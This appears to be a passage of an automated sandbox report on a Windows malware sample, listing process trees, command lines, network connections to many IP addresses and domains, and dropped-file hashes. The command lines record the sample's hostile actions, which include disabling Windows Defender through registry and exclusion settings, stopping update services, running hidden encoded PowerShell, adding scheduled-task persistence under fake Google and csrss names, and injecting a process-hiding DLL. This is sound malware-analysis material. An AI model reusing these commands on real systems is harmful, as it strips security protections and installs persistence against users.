PID 2520 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 1260 wrote to memory of 2160 N/A N/A C:\Users\Admin\AppData\Local\Temp\918B.exe
PID 1260 wrote to memory of 2160 N/A N/A C:\Users\Admin\AppData\Local\Temp\918B.exe
PID 1260 wrote to memory of 2160 N/A N/A C:\Users\Admin\AppData\Local\Temp\918B.exe
PID 1260 wrote to memory of 2160 N/A N/A C:\Users\Admin\AppData\Local\Temp\918B.exe
PID 1868 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 1868 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe
PID 2252 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe
PID 2252 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

Processes

C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe

"C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\8D13.exe

C:\Users\Admin\AppData\Local\Temp\8D13.exe

C:\Users\Admin\AppData\Local\Temp\8DC0.exe

C:\Users\Admin\AppData\Local\Temp\8DC0.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\8ED9.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

C:\Users\Admin\AppData\Local\Temp\8FB5.exe

C:\Users\Admin\AppData\Local\Temp\8FB5.exe

C:\Users\Admin\AppData\Local\Temp\90BF.exe

C:\Users\Admin\AppData\Local\Temp\90BF.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

C:\Users\Admin\AppData\Local\Temp\918B.exe

C:\Users\Admin\AppData\Local\Temp\918B.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\system32\taskeng.exe

taskeng.exe {625F4F04-2755-4BCE-B472-16D638B20406} S-1-5-21-3425689832-2386927309-2650718742-1000:AWDHTXES\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\1664.exe

C:\Users\Admin\AppData\Local\Temp\1664.exe

C:\Users\Admin\AppData\Local\Temp\1AD8.exe

C:\Users\Admin\AppData\Local\Temp\1AD8.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\2390.exe

C:\Users\Admin\AppData\Local\Temp\2390.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 520

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp" /SL4 $40164 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Users\Admin\AppData\Local\Temp\7068.exe

C:\Users\Admin\AppData\Local\Temp\7068.exe

C:\Users\Admin\AppData\Local\Temp\7855.exe

C:\Users\Admin\AppData\Local\Temp\7855.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gPKyesWPL" /SC once /ST 02:16:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gPKyesWPL"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 256

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231025051245.log C:\Windows\Logs\CBS\CbsPersist_20231025051245.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "15853144891527524001945275187191357750519714934011382663106475152949-1282761341"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1554704128-222346730-369300441-1736332362-9814224481424169158-1893469870-1551480124"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {52B13E67-5EE5-45A8-ACCE-D819C1C9930E} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gPKyesWPL"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 05:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AKYoIfz.exe\" 3Y /dnsite_idPfQ 385119 /S" /V1 /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
TR 185.216.70.222:80 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.71:4341 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.34:80 host-host-file8.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
NL 194.169.175.235:42691 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 258bc033-5a75-4d5f-af99-c31c29b9172e.uuid.allstatsin.ru udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp

Files

memory/2136-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2136-2-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2136-4-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2136-5-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2136-6-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1260-7-0x0000000002970000-0x0000000002986000-memory.dmp

memory/2136-8-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8D13.exe

MD5 a602fb933a815818e7daf5c88bb73deb
SHA1 1f7c3c767ad641ee2cc33ce57db7edb4db60c4fb
SHA256 fc55215044da76fe9094b8937599ef7af22a0d235afa260584bb1f24194f9f3f
SHA512 06143730a107f3e4caca39b41b4020f686e86552e1faa53d722dbe4881111de23759574392f43ad2b53ef4d5f3905726e523f49174a9d02846df625f1afa5cfd

C:\Users\Admin\AppData\Local\Temp\8D13.exe

MD5 a602fb933a815818e7daf5c88bb73deb
SHA1 1f7c3c767ad641ee2cc33ce57db7edb4db60c4fb
SHA256 fc55215044da76fe9094b8937599ef7af22a0d235afa260584bb1f24194f9f3f
SHA512 06143730a107f3e4caca39b41b4020f686e86552e1faa53d722dbe4881111de23759574392f43ad2b53ef4d5f3905726e523f49174a9d02846df625f1afa5cfd

C:\Users\Admin\AppData\Local\Temp\8DC0.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

\Users\Admin\AppData\Local\Temp\8D13.exe

MD5 a602fb933a815818e7daf5c88bb73deb
SHA1 1f7c3c767ad641ee2cc33ce57db7edb4db60c4fb
SHA256 fc55215044da76fe9094b8937599ef7af22a0d235afa260584bb1f24194f9f3f
SHA512 06143730a107f3e4caca39b41b4020f686e86552e1faa53d722dbe4881111de23759574392f43ad2b53ef4d5f3905726e523f49174a9d02846df625f1afa5cfd

C:\Users\Admin\AppData\Local\Temp\8ED9.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\8ED9.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

MD5 6b94af2713b9acf6f65cc6b9e08010ed
SHA1 278404e8fae40569fca7feeda0902bdfa999c804
SHA256 68cb5d45c7f8c3935fd665c5789c55dc095f310480f077240b46e6c878107ab9
SHA512 2f68ac396fe33ad41f4fbed9fdc2826d199fa59cb736ef055fdf3833c80c02e1e9f7e8f5f21ac9660e29b8dd28a6714acc10c9354baac31a4fc4f51f6bb2cfaf

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

MD5 6b94af2713b9acf6f65cc6b9e08010ed
SHA1 278404e8fae40569fca7feeda0902bdfa999c804
SHA256 68cb5d45c7f8c3935fd665c5789c55dc095f310480f077240b46e6c878107ab9
SHA512 2f68ac396fe33ad41f4fbed9fdc2826d199fa59cb736ef055fdf3833c80c02e1e9f7e8f5f21ac9660e29b8dd28a6714acc10c9354baac31a4fc4f51f6bb2cfaf

C:\Users\Admin\AppData\Local\Temp\8FB5.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

MD5 6b94af2713b9acf6f65cc6b9e08010ed
SHA1 278404e8fae40569fca7feeda0902bdfa999c804
SHA256 68cb5d45c7f8c3935fd665c5789c55dc095f310480f077240b46e6c878107ab9
SHA512 2f68ac396fe33ad41f4fbed9fdc2826d199fa59cb736ef055fdf3833c80c02e1e9f7e8f5f21ac9660e29b8dd28a6714acc10c9354baac31a4fc4f51f6bb2cfaf

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe

MD5 6b94af2713b9acf6f65cc6b9e08010ed
SHA1 278404e8fae40569fca7feeda0902bdfa999c804
SHA256 68cb5d45c7f8c3935fd665c5789c55dc095f310480f077240b46e6c878107ab9
SHA512 2f68ac396fe33ad41f4fbed9fdc2826d199fa59cb736ef055fdf3833c80c02e1e9f7e8f5f21ac9660e29b8dd28a6714acc10c9354baac31a4fc4f51f6bb2cfaf

C:\Users\Admin\AppData\Local\Temp\8FB5.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

MD5 38e60fa53532e902f5182995962e1af7
SHA1 eaef3607804b8eed29f8c0c307656b101077a6b7
SHA256 6893c3c6fc131cfcb84f64b9b7965eae8a6f05f0cf02d16061dfca5aeceefeee
SHA512 c8d9d9bc2d34d73b2170e6c29814ac450f3a35b4fe101e6ea5eb915784d6da08ed6ecc912f8a8f08cc75bbded8b390b541566b28f734dd8139ed724a67805472

C:\Users\Admin\AppData\Local\Temp\90BF.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

MD5 38e60fa53532e902f5182995962e1af7
SHA1 eaef3607804b8eed29f8c0c307656b101077a6b7
SHA256 6893c3c6fc131cfcb84f64b9b7965eae8a6f05f0cf02d16061dfca5aeceefeee
SHA512 c8d9d9bc2d34d73b2170e6c29814ac450f3a35b4fe101e6ea5eb915784d6da08ed6ecc912f8a8f08cc75bbded8b390b541566b28f734dd8139ed724a67805472

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

MD5 38e60fa53532e902f5182995962e1af7
SHA1 eaef3607804b8eed29f8c0c307656b101077a6b7
SHA256 6893c3c6fc131cfcb84f64b9b7965eae8a6f05f0cf02d16061dfca5aeceefeee
SHA512 c8d9d9bc2d34d73b2170e6c29814ac450f3a35b4fe101e6ea5eb915784d6da08ed6ecc912f8a8f08cc75bbded8b390b541566b28f734dd8139ed724a67805472

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe

MD5 38e60fa53532e902f5182995962e1af7
SHA1 eaef3607804b8eed29f8c0c307656b101077a6b7
SHA256 6893c3c6fc131cfcb84f64b9b7965eae8a6f05f0cf02d16061dfca5aeceefeee
SHA512 c8d9d9bc2d34d73b2170e6c29814ac450f3a35b4fe101e6ea5eb915784d6da08ed6ecc912f8a8f08cc75bbded8b390b541566b28f734dd8139ed724a67805472

